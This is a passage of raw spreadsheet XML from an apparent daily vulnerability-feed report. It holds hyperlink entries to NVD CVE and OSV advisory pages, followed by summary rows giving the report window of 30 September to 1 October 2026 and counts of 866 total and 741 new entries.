Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95370" TargetMode="External" Id="rId353" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101917" TargetMode="External" Id="rId354" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102265" TargetMode="External" Id="rId355" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102277" TargetMode="External" Id="rId356" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103053" TargetMode="External" Id="rId357" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103057" TargetMode="External" Id="rId358" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35189" TargetMode="External" Id="rId359" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42772" TargetMode="External" Id="rId360" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79417" TargetMode="External" Id="rId361" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81869" TargetMode="External" Id="rId362" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102269" TargetMode="External" Id="rId363" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95292" TargetMode="External" Id="rId364" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95300" TargetMode="External" Id="rId365" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95358" TargetMode="External" Id="rId366" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102312" TargetMode="External" Id="rId367" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95340" TargetMode="External" Id="rId368" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95342" TargetMode="External" Id="rId369" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-95361" TargetMode="External" Id="rId370" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35191" TargetMode="External" Id="rId371" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97711" TargetMode="External" Id="rId372" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102842" TargetMode="External" Id="rId373" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102847" TargetMode="External" Id="rId374" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102877" TargetMode="External" Id="rId375" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102771" TargetMode="External" Id="rId376" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102844" TargetMode="External" Id="rId377" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102820" TargetMode="External" Id="rId378" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102821" TargetMode="External" Id="rId379" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102822" TargetMode="External" Id="rId380" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102823" TargetMode="External" Id="rId381" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102824" TargetMode="External" Id="rId382" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102825" TargetMode="External" Id="rId383" /></Relationships>
</file>

<file path=xl/worksheets/_rels/sheet9.xml.rels><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102984" TargetMode="External" Id="rId1" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-103001" TargetMode="External" Id="rId2" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102983" TargetMode="External" Id="rId3" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-100689" TargetMode="External" Id="rId4" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101896" TargetMode="External" Id="rId5" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101898" TargetMode="External" Id="rId6" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101899" TargetMode="External" Id="rId7" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101900" TargetMode="External" Id="rId8" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101901" TargetMode="External" Id="rId9" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101902" TargetMode="External" Id="rId10" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101903" TargetMode="External" Id="rId11" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101904" TargetMode="External" Id="rId12" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101905" TargetMode="External" Id="rId13" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101906" TargetMode="External" Id="rId14" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101907" TargetMode="External" Id="rId15" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101908" TargetMode="External" Id="rId16" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101909" TargetMode="External" Id="rId17" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101915" TargetMode="External" Id="rId18" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101916" TargetMode="External" Id="rId19" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-101918" TargetMode="External" Id="rId20" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102270" TargetMode="External" Id="rId21" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76169" TargetMode="External" Id="rId22" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84377" TargetMode="External" Id="rId23" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84428" TargetMode="External" Id="rId24" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84469" TargetMode="External" Id="rId25" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84504" TargetMode="External" Id="rId26" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87817" TargetMode="External" Id="rId27" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87818" TargetMode="External" Id="rId28" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87819" TargetMode="External" Id="rId29" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-90776" TargetMode="External" Id="rId30" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91776" TargetMode="External" Id="rId31" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-91777" TargetMode="External" Id="rId32" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-92081" TargetMode="External" Id="rId33" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-93981" TargetMode="External" Id="rId34" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-3hv7-mjh2-fv65" TargetMode="External" Id="rId35" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-96h4-vgxj-gvm2" TargetMode="External" Id="rId36" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-9c5c-9qcx-q35q" TargetMode="External" Id="rId37" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-c2m8-h5v5-343r" TargetMode="External" Id="rId38" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-chx6-46f5-w4vp" TargetMode="External" Id="rId39" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-p98j-92pf-mc4p" TargetMode="External" Id="rId40" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/GHSA-vcvr-r3jv-pc5j" TargetMode="External" Id="rId41" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17339" TargetMode="External" Id="rId42" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17340" TargetMode="External" Id="rId43" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17341" TargetMode="External" Id="rId44" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17342" TargetMode="External" Id="rId45" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17343" TargetMode="External" Id="rId46" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17344" TargetMode="External" Id="rId47" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17345" TargetMode="External" Id="rId48" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17346" TargetMode="External" Id="rId49" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17347" TargetMode="External" Id="rId50" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17348" TargetMode="External" Id="rId51" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17349" TargetMode="External" Id="rId52" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17350" TargetMode="External" Id="rId53" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17351" TargetMode="External" Id="rId54" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17352" TargetMode="External" Id="rId55" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17353" TargetMode="External" Id="rId56" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17354" TargetMode="External" Id="rId57" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17355" TargetMode="External" Id="rId58" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17356" TargetMode="External" Id="rId59" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17357" TargetMode="External" Id="rId60" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17358" TargetMode="External" Id="rId61" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17359" TargetMode="External" Id="rId62" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17360" TargetMode="External" Id="rId63" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17361" TargetMode="External" Id="rId64" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17362" TargetMode="External" Id="rId65" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17363" TargetMode="External" Id="rId66" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17364" TargetMode="External" Id="rId67" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17365" TargetMode="External" Id="rId68" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17366" TargetMode="External" Id="rId69" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17367" TargetMode="External" Id="rId70" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17368" TargetMode="External" Id="rId71" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17369" TargetMode="External" Id="rId72" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17370" TargetMode="External" Id="rId73" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17371" TargetMode="External" Id="rId74" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17372" TargetMode="External" Id="rId75" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17373" TargetMode="External" Id="rId76" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17374" TargetMode="External" Id="rId77" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17375" TargetMode="External" Id="rId78" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17376" TargetMode="External" Id="rId79" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17377" TargetMode="External" Id="rId80" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17378" TargetMode="External" Id="rId81" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17379" TargetMode="External" Id="rId82" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17380" TargetMode="External" Id="rId83" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17381" TargetMode="External" Id="rId84" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17382" TargetMode="External" Id="rId85" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17383" TargetMode="External" Id="rId86" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17384" TargetMode="External" Id="rId87" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17385" TargetMode="External" Id="rId88" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17386" TargetMode="External" Id="rId89" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17387" TargetMode="External" Id="rId90" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17388" TargetMode="External" Id="rId91" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17389" TargetMode="External" Id="rId92" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17390" TargetMode="External" Id="rId93" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17391" TargetMode="External" Id="rId94" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17392" TargetMode="External" Id="rId95" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17393" TargetMode="External" Id="rId96" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17394" TargetMode="External" Id="rId97" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17395" TargetMode="External" Id="rId98" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17396" TargetMode="External" Id="rId99" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17397" TargetMode="External" Id="rId100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17398" TargetMode="External" Id="rId101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17399" TargetMode="External" Id="rId102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17400" TargetMode="External" Id="rId103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17401" TargetMode="External" Id="rId104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17402" TargetMode="External" Id="rId105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17403" TargetMode="External" Id="rId106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17404" TargetMode="External" Id="rId107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17405" TargetMode="External" Id="rId108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17406" TargetMode="External" Id="rId109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17407" TargetMode="External" Id="rId110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17408" TargetMode="External" Id="rId111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17409" TargetMode="External" Id="rId112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17410" TargetMode="External" Id="rId113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17411" TargetMode="External" Id="rId114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17412" TargetMode="External" Id="rId115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17413" TargetMode="External" Id="rId116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17414" TargetMode="External" Id="rId117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17415" TargetMode="External" Id="rId118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17416" TargetMode="External" Id="rId119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://osv.dev/vulnerability/MAL-2026-17417" TargetMode="External" Id="rId120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97689" TargetMode="External" Id="rId121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102930" TargetMode="External" Id="rId122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97687" TargetMode="External" Id="rId123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97688" TargetMode="External" Id="rId124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102938" TargetMode="External" Id="rId125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-97711" TargetMode="External" Id="rId126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102601" TargetMode="External" Id="rId127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102820" TargetMode="External" Id="rId128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102821" TargetMode="External" Id="rId129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102822" TargetMode="External" Id="rId130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102823" TargetMode="External" Id="rId131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102824" TargetMode="External" Id="rId132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-102825" TargetMode="External" Id="rId133"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2026-10-01</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="2" t="inlineStr">
        <is>
          <t>Window (UTC)</t>
        </is>
      </c>
      <c r="B3" s="3" t="inlineStr">
        <is>
          <t>2026-09-30T06:35 to 2026-10-01T06:35</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="2" t="inlineStr">
        <is>
          <t>Generated</t>
        </is>
      </c>
      <c r="B4" s="3" t="inlineStr">
        <is>
          <t>2026-10-01 06:36:53 UTC</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="2" t="inlineStr"/>
      <c r="B5" s="3" t="inlineStr"/>
    </row>
    <row r="6">
      <c r="A6" s="2" t="inlineStr">
        <is>
          <t>Total entries</t>
        </is>
      </c>
      <c r="B6" s="3" t="n">
        <v>866</v>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="2" t="inlineStr">
        <is>
          <t xml:space="preserve">  New - published today</t>
        </is>
      </c>
      <c r="B7" s="3" t="n">
        <v>741</v>
      </c>
    </row>
    <row r="8">
